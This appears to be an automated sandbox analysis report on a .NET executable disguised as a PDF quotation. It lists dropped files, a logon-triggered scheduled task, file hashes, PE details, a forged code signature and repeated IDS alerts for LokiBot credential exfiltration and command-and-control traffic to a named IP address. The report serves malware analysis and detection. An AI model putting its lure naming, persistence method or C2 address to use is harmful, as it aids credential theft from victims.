SHA-512:	5DD118F7C51CAED3D316440CB14238B80D0E10CE577024346ADC6DF82BDDD01DFD12AD08C232AD12AE847D47705167756279D62B525C45A2C657CE43D3C4AD09
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmp36D0.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\mexnJkivovwH.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1578
Entropy (8bit):	5.109490627150337
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta4+xvn:cge1wYrFdOFzOzN33ODOiDdKrsuT1yv
MD5:	224FCB103E17065CEFD6151E048226D7
SHA1:	236687AFABE3832DC5F1C32C87B9D0CD17AE046D
SHA-256:	990A26A889F82959DF42AD1979EAD9F9E1DD923E98B53E53D9EEF07E4374156D
SHA-512:	5DD118F7C51CAED3D316440CB14238B80D0E10CE577024346ADC6DF82BDDD01DFD12AD08C232AD12AE847D47705167756279D62B525C45A2C657CE43D3C4AD09
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Users\user\Desktop\Quotation2025-0107pdf.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\Desktop\Quotation2025-0107pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D898504A722BFF1524134C6AB6A5EAA5
SHA1:	E0FDC90C2CA2A0219C99D2758E68C18875A3E11E
SHA-256:	878F32F76B159494F5A39F9321616C6068CDB82E88DF89BCC739BBC1EA78E1F9
SHA-512:	26A4398BFFB0C0AEF9A6EC53CD3367A2D0ABF2F70097F711BBBF1E9E32FD9F1A72121691BB6A39EEB55D596EDD527934E541B4DEFB3B1426B1D1A6429804DC61
Malicious:	false
Preview:	..............................................

C:\Users\user\AppData\Roaming\mexnJkivovwH.exe

Download File

Process:	C:\Users\user\Desktop\Quotation2025-0107pdf.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	725512
Entropy (8bit):	7.401624367154157
Encrypted:	false
SSDEEP:	12288:mfuj5rWYMV+I4MVKWTwxAVNhpDsWpwEQx4JNXwwaFi3oqW8JdKPCTjcZPq0vzkR:gSrGRgMwxAVNvlvXw5LAdKKn8M
MD5:	FF0A37E1048052C58526A9C38EFC1954
SHA1:	CDB18E6094372C6AB8280723BB9C64B9BA8269DA
SHA-256:	9E39A3FC8FCA2CC19C64E0C75E88F897A7D07F43D3430596FECDCCAE2B36D680
SHA-512:	5EBF8FB73960113811B77534BD773F1C541FB381775E7944CC9CA8D0D48FB2E07D8D63163B074E8DAC89D61AA698325AE2FA020A1B15695F0EF87531F6FEA411
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 24%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}g..............0.................. ........@.. ....................... ............`.................................<...O........................6........................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H.......h`...\|..........P................................................ZL.ZzM...E...H.N..;..._<........!..`^#g.....Y.1...]oU....>.J.n?...Y.~...\q.T".J... .hM.V.=...7.z. =l.P...p._.M..R..O....+`<.LN..+1..D8...nc.......X.VT....5.i..8.v(.A?F.'...K.i.R.[>g...-....\.2k[..\|T. ..V....V..}.. .9..L...[.VsN.6qA.y].I.3.......Sc.k..d..yCa[j..6M.........C.o.I.....{U5V&.c.&.E..........L.x\.`.'.:..........fP\..S@.1....;_.C..t-.l..T....b.........5.x...xSR.i.w:...3.....

C:\Users\user\AppData\Roaming\mexnJkivovwH.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Quotation2025-0107pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.401624367154157
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Quotation2025-0107pdf.exe
File size:	725'512 bytes
MD5:	ff0a37e1048052c58526a9c38efc1954
SHA1:	cdb18e6094372c6ab8280723bb9c64b9ba8269da
SHA256:	9e39a3fc8fca2cc19c64e0c75e88f897a7d07f43d3430596fecdccae2b36d680
SHA512:	5ebf8fb73960113811b77534bd773f1c541fb381775e7944cc9ca8d0d48fb2e07d8d63163b074e8dac89d61aa698325ae2fa020a1b15695f0ef87531f6fea411
SSDEEP:	12288:mfuj5rWYMV+I4MVKWTwxAVNhpDsWpwEQx4JNXwwaFi3oqW8JdKPCTjcZPq0vzkR:gSrGRgMwxAVNvlvXw5LAdKKn8M
TLSH:	48F48B492355E4CDD0D70ABC5893FFB795104D484A22C2C247EEB9A7369B98EBA0F1C7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}g..............0.................. ........@.. ....................... ............`................................

File Icon


Icon Hash:	13294d96922b2b0f

Static PE Info

General

Entrypoint:	0x4add8e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x677D0404 [Tue Jan 7 10:37:56 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 00:00:00 08/11/2021 23:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xadd3c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xae000	0x19f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xadc00	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xabd94	0xabe00	89156d02495e78914c1eb5dbd6714be4	False	0.7683068181818182	data	7.401526227264673	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xae000	0x19f0	0x1a00	0f8b6e63385fd4d0d405f5a16f287bae	False	0.6604567307692307	data	6.061547500887534	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb0000	0xc	0x200	27c632a4aa502aed1d4875d325175a71	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xae118	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	0.8129432624113475
RT_ICON	0xae580	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.7136491557223265
RT_GROUP_ICON	0xaf628	0x22	data	0.9411764705882353
RT_VERSION	0xaf64c	0x3a0	data	0.4170258620689655

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-07T12:31:59.242781+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50139	TCP
2025-01-07T12:32:00.796955+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49735	94.156.177.41	80	TCP
2025-01-07T12:32:00.796955+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49735	94.156.177.41	80	TCP
2025-01-07T12:32:00.796955+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49735	94.156.177.41	80	TCP
2025-01-07T12:32:01.519943+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.4	49735	94.156.177.41	80	TCP
2025-01-07T12:32:01.754699+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49737	94.156.177.41	80	TCP
2025-01-07T12:32:01.754699+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49737	94.156.177.41	80	TCP
2025-01-07T12:32:01.754699+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49737	94.156.177.41	80	TCP
2025-01-07T12:32:02.466654+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.4	49737	94.156.177.41	80	TCP
2025-01-07T12:32:02.549908+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49739	94.156.177.41	80	TCP
2025-01-07T12:32:02.549908+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49739	94.156.177.41	80	TCP
2025-01-07T12:32:02.549908+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49739	94.156.177.41	80	TCP
2025-01-07T12:32:03.275190+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49739	94.156.177.41	80	TCP
2025-01-07T12:32:03.275190+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49739	94.156.177.41	80	TCP
2025-01-07T12:32:03.316472+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49739	TCP
2025-01-07T12:32:03.602114+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49740	94.156.177.41	80	TCP
2025-01-07T12:32:03.602114+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49740	94.156.177.41	80	TCP
2025-01-07T12:32:03.602114+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49740	94.156.177.41	80	TCP
2025-01-07T12:32:04.338995+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49740	94.156.177.41	80	TCP
2025-01-07T12:32:04.338995+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49740	94.156.177.41	80	TCP
2025-01-07T12:32:04.346344+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49740	TCP
2025-01-07T12:32:04.490438+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49741	94.156.177.41	80	TCP
2025-01-07T12:32:04.490438+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49741	94.156.177.41	80	TCP
2025-01-07T12:32:04.490438+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49741	94.156.177.41	80	TCP
2025-01-07T12:32:05.248744+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49741	94.156.177.41	80	TCP
2025-01-07T12:32:05.248744+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49741	94.156.177.41	80	TCP
2025-01-07T12:32:05.262504+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49741	TCP
2025-01-07T12:32:05.412187+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49742	94.156.177.41	80	TCP
2025-01-07T12:32:05.412187+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49742	94.156.177.41	80	TCP
2025-01-07T12:32:05.412187+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49742	94.156.177.41	80	TCP
2025-01-07T12:32:07.009365+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49742	94.156.177.41	80	TCP
2025-01-07T12:32:07.009365+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49742	94.156.177.41	80	TCP
2025-01-07T12:32:07.009649+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49742	TCP
2025-01-07T12:32:07.187246+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49743	94.156.177.41	80	TCP
2025-01-07T12:32:07.187246+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49743	94.156.177.41	80	TCP
2025-01-07T12:32:07.187246+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49743	94.156.177.41	80	TCP
2025-01-07T12:32:07.935086+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49743	94.156.177.41	80	TCP
2025-01-07T12:32:07.935086+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49743	94.156.177.41	80	TCP
2025-01-07T12:32:07.939892+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49743	TCP
2025-01-07T12:32:08.083804+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49744	94.156.177.41	80	TCP
2025-01-07T12:32:08.083804+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49744	94.156.177.41	80	TCP
2025-01-07T12:32:08.083804+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49744	94.156.177.41	80	TCP
2025-01-07T12:32:08.818254+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49744	94.156.177.41	80	TCP
2025-01-07T12:32:08.818254+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49744	94.156.177.41	80	TCP
2025-01-07T12:32:08.824777+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49744	TCP
2025-01-07T12:32:08.974835+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49745	94.156.177.41	80	TCP
2025-01-07T12:32:08.974835+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49745	94.156.177.41	80	TCP
2025-01-07T12:32:08.974835+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49745	94.156.177.41	80	TCP
2025-01-07T12:32:09.731700+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49745	94.156.177.41	80	TCP
2025-01-07T12:32:09.731700+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49745	94.156.177.41	80	TCP
2025-01-07T12:32:09.737549+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49745	TCP
2025-01-07T12:32:10.073415+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49746	94.156.177.41	80	TCP
2025-01-07T12:32:10.073415+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49746	94.156.177.41	80	TCP
2025-01-07T12:32:10.073415+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49746	94.156.177.41	80	TCP
2025-01-07T12:32:10.797050+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49746	94.156.177.41	80	TCP
2025-01-07T12:32:10.797050+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49746	94.156.177.41	80	TCP
2025-01-07T12:32:10.807324+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49746	TCP
2025-01-07T12:32:11.223373+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49747	94.156.177.41	80	TCP
2025-01-07T12:32:11.223373+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49747	94.156.177.41	80	TCP
2025-01-07T12:32:11.223373+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49747	94.156.177.41	80	TCP
2025-01-07T12:32:11.917927+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49747	94.156.177.41	80	TCP
2025-01-07T12:32:11.917927+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49747	94.156.177.41	80	TCP
2025-01-07T12:32:11.922696+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49747	TCP
2025-01-07T12:32:12.117368+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49749	94.156.177.41	80	TCP
2025-01-07T12:32:12.117368+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49749	94.156.177.41	80	TCP
2025-01-07T12:32:12.117368+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49749	94.156.177.41	80	TCP
2025-01-07T12:32:12.853819+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49749	94.156.177.41	80	TCP
2025-01-07T12:32:12.853819+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49749	94.156.177.41	80	TCP
2025-01-07T12:32:12.858606+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49749	TCP
2025-01-07T12:32:13.004316+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49751	94.156.177.41	80	TCP
2025-01-07T12:32:13.004316+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49751	94.156.177.41	80	TCP
2025-01-07T12:32:13.004316+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49751	94.156.177.41	80	TCP
2025-01-07T12:32:13.756413+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49751	94.156.177.41	80	TCP
2025-01-07T12:32:13.756413+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49751	94.156.177.41	80	TCP
2025-01-07T12:32:13.761638+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49751	TCP
2025-01-07T12:32:13.932697+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49754	94.156.177.41	80	TCP
2025-01-07T12:32:13.932697+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49754	94.156.177.41	80	TCP
2025-01-07T12:32:13.932697+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49754	94.156.177.41	80	TCP
2025-01-07T12:32:14.647155+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49754	94.156.177.41	80	TCP
2025-01-07T12:32:14.647155+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49754	94.156.177.41	80	TCP
2025-01-07T12:32:14.651917+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49754	TCP
2025-01-07T12:32:14.805465+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49756	94.156.177.41	80	TCP
2025-01-07T12:32:14.805465+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49756	94.156.177.41	80	TCP
2025-01-07T12:32:14.805465+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49756	94.156.177.41	80	TCP
2025-01-07T12:32:15.593522+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49756	94.156.177.41	80	TCP
2025-01-07T12:32:15.593522+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49756	94.156.177.41	80	TCP
2025-01-07T12:32:15.599338+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49756	TCP
2025-01-07T12:32:15.769592+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49758	94.156.177.41	80	TCP
2025-01-07T12:32:15.769592+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49758	94.156.177.41	80	TCP
2025-01-07T12:32:15.769592+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49758	94.156.177.41	80	TCP
2025-01-07T12:32:16.533683+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49758	94.156.177.41	80	TCP
2025-01-07T12:32:16.533683+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49758	94.156.177.41	80	TCP
2025-01-07T12:32:16.538409+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49758	TCP
2025-01-07T12:32:16.694494+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49759	94.156.177.41	80	TCP
2025-01-07T12:32:16.694494+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49759	94.156.177.41	80	TCP
2025-01-07T12:32:16.694494+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49759	94.156.177.41	80	TCP
2025-01-07T12:32:17.445085+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49759	94.156.177.41	80	TCP
2025-01-07T12:32:17.445085+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49759	94.156.177.41	80	TCP
2025-01-07T12:32:17.450376+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49759	TCP
2025-01-07T12:32:17.621099+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49760	94.156.177.41	80	TCP
